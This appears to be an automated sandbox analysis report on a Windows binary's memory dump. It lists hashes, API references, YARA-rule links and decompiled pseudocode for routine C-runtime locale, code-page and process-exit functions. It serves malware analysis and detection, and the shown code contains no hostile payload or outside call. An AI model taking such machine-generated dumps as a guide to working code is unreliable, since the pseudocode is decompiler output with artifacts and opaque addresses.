API String ID: 2016158738-1101299513
Opcode ID: bcb97cf468352329daae8da24e099d3a37581ed3a5a6502139972ff4adf01189
Instruction ID: 5dad59da3816a77be4c72db1fbbd1aae75d71c583232739d5da1f36cc5b23e35
Opcode Fuzzy Hash: bcb97cf468352329daae8da24e099d3a37581ed3a5a6502139972ff4adf01189
Instruction Fuzzy Hash: 6B11293A2007015FDB189F3AC8916FAB791FFC4318B18443EE94647740D7796903C754

Uniqueness

Uniqueness Score: -1.00%

Function 004BE848, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

Part of subcall function 004B361B: _free.LIBCMT ref: 004B367A
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3687

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004BE89C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004BE8ED
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004BE9AD

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: abe87ee22436afe66af70bf2835cf51a22d3cb90ef5674b571e9fe376c5d4fb4
Instruction ID: b8897cfa748f39599769454d19347c98fbe2dc88252d21f820cf79164d2707a8
Opcode Fuzzy Hash: abe87ee22436afe66af70bf2835cf51a22d3cb90ef5674b571e9fe376c5d4fb4
Instruction Fuzzy Hash: CE61A0B15002079BEB289F26CC82BFB77A8FF84304F10416BE906C6685E778DD55CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004A5CAD, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004A5DA5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004A5DAF
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 004A5DBC

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 5d9482be326c7d527dbe2f68cb72066154fb6ea8c5ffd934f3698f1c3843cf7a
Instruction ID: 1167babdbfecde1b966640dd9506f7e739ba269d19166baf71a37416fb5b42dd
Opcode Fuzzy Hash: 5d9482be326c7d527dbe2f68cb72066154fb6ea8c5ffd934f3698f1c3843cf7a
Instruction Fuzzy Hash: 0D31D475901218ABCB21DF24DD89B9DBBB8AF18310F5041EAE41CA7251EB349F958F48

Uniqueness

Uniqueness Score: -1.00%

Function 004B0BDB, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,004B0BB1,00000003,004E89F0,0000000C,004B0D08,00000003,00000002,00000000,?,004AEAC5,00000003), ref: 004B0BFC
TerminateProcess.KERNEL32(00000000,?,004B0BB1,00000003,004E89F0,0000000C,004B0D08,00000003,00000002,00000000,?,004AEAC5,00000003), ref: 004B0C03
ExitProcess.KERNEL32 ref: 004B0C15

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: d4c911f6f2dd753bdfeb11c1924c63cca6fe4868728291edfb910bb7476e2df0
Instruction ID: c56dbcfab799931cf10db001ef567c99da24c3266aedb91159b1cf05c5277acd
Opcode Fuzzy Hash: d4c911f6f2dd753bdfeb11c1924c63cca6fe4868728291edfb910bb7476e2df0
Instruction Fuzzy Hash: 57E0BF31000548EFCF156F65DE09AAA3F79EF80746F114129F8055A222DB3ADD51CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004BB930, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 004BBAC3

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 5140aba18678a7241170e3f8af1682bebc522092bdff4b63fc60a06504873630
Instruction ID: 847059fcfc38fe7a8cd7bf4898f30f620c9cbcfd84cc4b189b7c5a0d9693d8b1
Opcode Fuzzy Hash: 5140aba18678a7241170e3f8af1682bebc522092bdff4b63fc60a06504873630
Instruction Fuzzy Hash: E83104B19002096FCB249E79CC84EFB7BBDDB86314F0001AEF518D7251E7B49E448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004BE7BB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

EnumSystemLocalesW.KERNEL32(004BEA98,00000001,00000006,?,x!K,?,004BEE39,x!K,?,?,?,?,?,004B2178,?,?), ref: 004BE807

Strings

x!K, xrefs: 004BE7C0

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID: x!K
API String ID: 2016158738-3358747905
Opcode ID: 9eff6c2ff4229debc27e2b779ac707cbe6cb9b530aa8d0b3b4c76780bdb226a8
Instruction ID: 7b8b7c13165a6812276f8a000f5a93d639edc0486e8c635ee401ce779fbff6e7
Opcode Fuzzy Hash: 9eff6c2ff4229debc27e2b779ac707cbe6cb9b530aa8d0b3b4c76780bdb226a8
Instruction Fuzzy Hash: E7F028362007055FDB145F3B9881AFB7B95EFC472CB15843EFA0187640DA759C01C724

Uniqueness

Uniqueness Score: -1.00%

Function 004B79BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004B1BD6,?,00000006), ref: 004B7A0D

Strings

GetLocaleInfoEx, xrefs: 004B79CB, 004B79D5

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: ca4a6a1427d4635ea958cd06f794cb870750147f9d895e78f0c828762b98c521
Instruction ID: d612c0539bf17ef84838f6473508acd14419c821a901717fdaacf2d9df94a25a
Opcode Fuzzy Hash: ca4a6a1427d4635ea958cd06f794cb870750147f9d895e78f0c828762b98c521
Instruction Fuzzy Hash: FAF0F631A84208BBCB12AF61DC02FAE7B55DF58750F40456AFC1577291CA396E2096AE

Uniqueness

Uniqueness Score: -1.00%

Function 004BEA98, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

Part of subcall function 004B361B: _free.LIBCMT ref: 004B367A
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3687

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004BEAEC

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 9e6c0351152a6948c3fd8e002a8de494d49c005bb48297590931a421b534e45a
Instruction ID: f751f6f9fe1f63eb4c7a095d67affd3c3b39a4cebc484dc19d5eff0583ea3e79
Opcode Fuzzy Hash: 9e6c0351152a6948c3fd8e002a8de494d49c005bb48297590931a421b534e45a
Instruction Fuzzy Hash: 0D21A172514206ABDB24DE26DC41BFB73E8EB84315F10417BE902C7241EB79AD54CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004BECC8, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004BEA66,00000000,00000000,?), ref: 004BECF4

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d8da3e837e6ea4f579176a18f69e1c7c0e0c2c862b53e2170e44e3126a011736
Instruction ID: 7968fa5303cceb279dafcce26a756fabc0274ad974cbf73a948239727de34d8f
Opcode Fuzzy Hash: d8da3e837e6ea4f579176a18f69e1c7c0e0c2c862b53e2170e44e3126a011736
Instruction Fuzzy Hash: 02F0F9329001177FDB285B27D805BFB7B6CEB80714F15482AEC05A3241EA7DBE11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 004B74D1, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004AE1BD: RtlEnterCriticalSection.KERNEL32(?,?,004B33BB,?,004E8AB8,00000008,004B3489,?,?,?), ref: 004AE1CC

EnumSystemLocalesW.KERNEL32(004B748B,00000001,004E8BF8,0000000C), ref: 004B7509

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: ebc635263806577d488cb3cf6e53876ac01697b2d03d4d0b600487b880c08a96
Instruction ID: aa80e6bf23d4cf6c98e3b400957971dbf420db3a46403d1edf13e4055d0ad18d
Opcode Fuzzy Hash: ebc635263806577d488cb3cf6e53876ac01697b2d03d4d0b600487b880c08a96
Instruction Fuzzy Hash: 28F04472910214DFDB14EF79D846B5D3BE0EB04314F10426AF424DF296C7789940DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004BE6D5, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004B361B: GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
Part of subcall function 004B361B: _free.LIBCMT ref: 004B3652
Part of subcall function 004B361B: SetLastError.KERNEL32(00000000), ref: 004B3693

EnumSystemLocalesW.KERNEL32(004BE62C,00000001,00000006,?,?,004BEE97,x!K,?,?,?,?,?,004B2178,?,?,?), ref: 004BE70C

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: f3e13895434416931fc3305c34779ffb875606a7c982482e6172eef6b5f99b8b
Instruction ID: 72abc5e99d83af4b95fe5ef19574b0a3d2701dbfe0e4b6688a275fa6e77dc189
Opcode Fuzzy Hash: f3e13895434416931fc3305c34779ffb875606a7c982482e6172eef6b5f99b8b
Instruction Fuzzy Hash: BFF0E53A30020597CB249F3BD8496EBBF94EFC1715B5B405EFA058B291C6799D42C768

Uniqueness

Uniqueness Score: -1.00%

Function 0043F7AD, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,004E903C), ref: 0043F7AD

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: ead9e62d5165b6d422ee5abb7898b713a93b4e29587a02938d804a0fbd85c250
Instruction ID: 0971999e621eba9c9becc2960c11be38c200db7777b7c233c3647d2a9783d2a2
Opcode Fuzzy Hash: ead9e62d5165b6d422ee5abb7898b713a93b4e29587a02938d804a0fbd85c250
Instruction Fuzzy Hash: 10B09272EB1408024E2006340E0826623A692AA613F801573E0C2C0228EB29C897E00C

Uniqueness

Uniqueness Score: -1.00%

Function 0043865F, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88372051f017c5bf043178af136925ef495b466c4ad18f02f019001dbc2e48
Instruction ID: f806e8b762083dca8181b49f826a94bf69936ea6000fe717ade9226518f1eb44
Opcode Fuzzy Hash: 1b88372051f017c5bf043178af136925ef495b466c4ad18f02f019001dbc2e48
Instruction Fuzzy Hash: ADE04F73914A14AB9724DFADD8424ABFBF8EA48210740C86ED5AAE3521E170F4468A41

Uniqueness

Uniqueness Score: -1.00%

Function 004AE54D, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004AE54D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				intOrPtr* _t106;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				intOrPtr _t172;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				void* _t192;
				signed int _t194;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x4eb018; // 0xa3bb88a6
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if(_t172 == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x4060d8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x406358;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x4064d8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return L0049CE1D(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *_t106 != 0) {
					L3:
					_v44 = E004B2F72(_t172, 1, 4);
					E004B2FCF(_t170);
					_v32 = E004B2F72(_t172, 0x180, 2);
					E004B2FCF(_t170);
					_v36 = E004B2F72(_t172, 0x180, 1);
					E004B2FCF(_t170);
					_v40 = E004B2F72(_t172, 0x180, 1);
					E004B2FCF(_t170);
					_t197 = E004B2F72(_t172, 0x101, 1);
					_v52 = _t197;
					E004B2FCF(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E004B2FCF(_v44);
						E004B2FCF(_v32);
						E004B2FCF(_v36);
						E004B2FCF(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t130 = L004B9950(_t170, _t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = L004B9950(_t170, _t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = L004BAE04(_t170, _t197, _t211, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t192 = _v32;
							_t138 = _t192 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t192, _t192 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E004B2FCF( *(_t215 + 0x90) - 0xfe);
										E004B2FCF( *(_t215 + 0x94) - 0x80);
										E004B2FCF( *(_t215 + 0x98) - 0x80);
										E004B2FCF( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E004B2FCF(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t192 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t194 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t194 <= _t166) {
									 *((char*)(_t194 + _t197)) = 0x20;
									_t194 = _t194 + 1;
									__eflags = _t194;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_push(_t106);
				_push(0x1004);
				_push(_t172);
				_push(0);
				_push( &_v76);
				_t168 = L004BAC52(0, __edi, _t211);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x004ae555
0x004ae55c
0x004ae561
0x004ae564
0x004ae567
0x004ae56a
0x004ae56d
0x004ae573
0x004ae576
0x004ae579
0x004ae57c
0x004ae57f
0x004ae584
0x004ae8a4
0x004ae8a6
0x004ae8a8
0x004ae8a8
0x004ae8ab
0x004ae8b1
0x004ae8b3
0x004ae8b9
0x004ae8bf
0x004ae8c9
0x004ae8d3
0x004ae8da
0x004ae8ea
0x004ae8ea
0x004ae58a
0x004ae58d
0x004ae592
0x004ae5b0
0x004ae5ba
0x004ae5bd
0x004ae5d0
0x004ae5d3
0x004ae5e1
0x004ae5e4
0x004ae5f2
0x004ae5f5
0x004ae606
0x004ae609
0x004ae60c
0x004ae611
0x004ae617
0x004ae86b
0x004ae86e
0x004ae876
0x004ae87e
0x004ae886
0x004ae890
0x004ae890
0x00000000
0x004ae640
0x004ae640
0x004ae642
0x004ae642
0x004ae645
0x004ae646
0x004ae65c
0x00000000
0x00000000
0x004ae662
0x004ae665
0x004ae668
0x00000000
0x00000000
0x004ae675
0x004ae678
0x004ae698
0x004ae69d
0x004ae6a0
0x004ae6a2
0x00000000
0x00000000
0x004ae6bc
0x004ae6cc
0x004ae6d1
0x004ae6d6
0x00000000
0x00000000
0x004ae6e0
0x004ae70d
0x004ae723
0x004ae726
0x004ae72b
0x004ae730
0x00000000
0x00000000
0x004ae736
0x004ae73b
0x004ae741
0x004ae744
0x004ae747
0x004ae74a
0x004ae74d
0x004ae750
0x004ae757
0x004ae75a
0x004ae75d
0x004ae75f
0x004ae765
0x004ae768
0x004ae76a
0x004ae7ac
0x004ae7ae
0x004ae7b7
0x004ae7bc
0x004ae7bf
0x004ae7c9
0x004ae7cb
0x004ae7ce
0x004ae7d0
0x004ae7d9
0x004ae7db
0x004ae7dd
0x004ae7de
0x004ae7e9
0x004ae7ee
0x004ae7f2
0x004ae800
0x004ae813
0x004ae821
0x004ae82c
0x004ae831
0x004ae7f2
0x004ae834
0x004ae837
0x004ae83d
0x004ae846
0x004ae84b
0x004ae854
0x004ae85d
0x004ae866
0x004ae891
0x004ae894
0x00000000
0x004ae771
0x004ae771
0x004ae774
0x004ae774
0x004ae778
0x00000000
0x00000000
0x004ae77a
0x004ae783
0x004ae7a1
0x004ae7a1
0x004ae7a7
0x00000000
0x00000000
0x00000000
0x004ae7a7
0x004ae78b
0x004ae78e
0x004ae793
0x004ae794
0x004ae797
0x004ae79d
0x00000000
0x004ae78e
0x00000000
0x004ae7a9
0x004ae6e7
0x004ae6e7
0x004ae6ea
0x004ae6ea
0x004ae6ee
0x00000000
0x00000000
0x004ae6f0
0x004ae6f4
0x004ae701
0x004ae6f9
0x004ae6fd
0x004ae6fd
0x004ae6fe
0x004ae6fe
0x004ae705
0x004ae70b
0x00000000
0x00000000
0x00000000
0x004ae70b
0x00000000
0x004ae6ea
0x004ae6e0
0x004ae617
0x004ae594
0x004ae595
0x004ae59a
0x004ae59e
0x004ae59f
0x004ae5a0
0x004ae5a5
0x004ae5aa
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 004AE5BD
_free.LIBCMT ref: 004AE5D3
_free.LIBCMT ref: 004AE5E4
_free.LIBCMT ref: 004AE5F5
_free.LIBCMT ref: 004AE60C
GetCPInfo.KERNEL32(?,?), ref: 004AE654

Part of subcall function 004BAC52: _free.LIBCMT ref: 004BACBD

_free.LIBCMT ref: 004AE800
_free.LIBCMT ref: 004AE813
_free.LIBCMT ref: 004AE821
_free.LIBCMT ref: 004AE82C
_free.LIBCMT ref: 004AE86E
_free.LIBCMT ref: 004AE876
_free.LIBCMT ref: 004AE87E
_free.LIBCMT ref: 004AE886
_free.LIBCMT ref: 004AE894

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 8a636e2bbdafa0c27dd1f470b398a38e7b7c2fc48a7cac7d3dddb75e94c7b168
Instruction ID: 41dedc299b97d59205ef8975e4c92ae30be2675a0302f90edd16b3296b1dee3b
Opcode Fuzzy Hash: 8a636e2bbdafa0c27dd1f470b398a38e7b7c2fc48a7cac7d3dddb75e94c7b168
Instruction Fuzzy Hash: 07B1CE70900205EFDB11DF6AC881BEEBBF4BF19304F14456EF869A7342D779A8419B68

Uniqueness

Uniqueness Score: -1.00%

Function 004BDA4B, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004BDA4B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x4eb098) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004B2FCF(_t46);
							E004BCDDE( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004B2FCF(_t47);
							E004BD298( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004B2FCF( *((intOrPtr*)(_t74 + 0x7c)));
						E004B2FCF( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004B2FCF( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004B2FCF( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004B2FCF( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004B2FCF( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E004BDBBE( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x4eb288) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004B2FCF(_t31);
							E004B2FCF( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004B2FCF(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004B2FCF(_t74);
			}

0x004bda53
0x004bda57
0x004bda5f
0x004bda68
0x004bda6d
0x004bda74
0x004bda7c
0x004bda84
0x004bda8f
0x004bda95
0x004bda96
0x004bda9e
0x004bdaa6
0x004bdab1
0x004bdab7
0x004bdabb
0x004bdac6
0x004bdacc
0x004bda6d
0x004bdacd
0x004bdad5
0x004bdae8
0x004bdafb
0x004bdb09
0x004bdb14
0x004bdb19
0x004bdb22
0x004bdb2a
0x004bdb2b
0x004bdb31
0x004bdb34
0x004bdb37
0x004bdb3e
0x004bdb40
0x004bdb44
0x004bdb4c
0x004bdb53
0x004bdb59
0x004bdb5a
0x004bdb5a
0x004bdb61
0x004bdb63
0x004bdb68
0x004bdb70
0x004bdb75
0x004bdb76
0x004bdb76
0x004bdb79
0x004bdb7c
0x004bdb7f
0x004bdb82
0x004bdb82
0x004bdb94

APIs

___free_lconv_mon.LIBCMT ref: 004BDA8F

Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCDFB
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE0D
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE1F
Part of subcall function 004BCDDE: _free.LIBCMT ref: 004BCE31
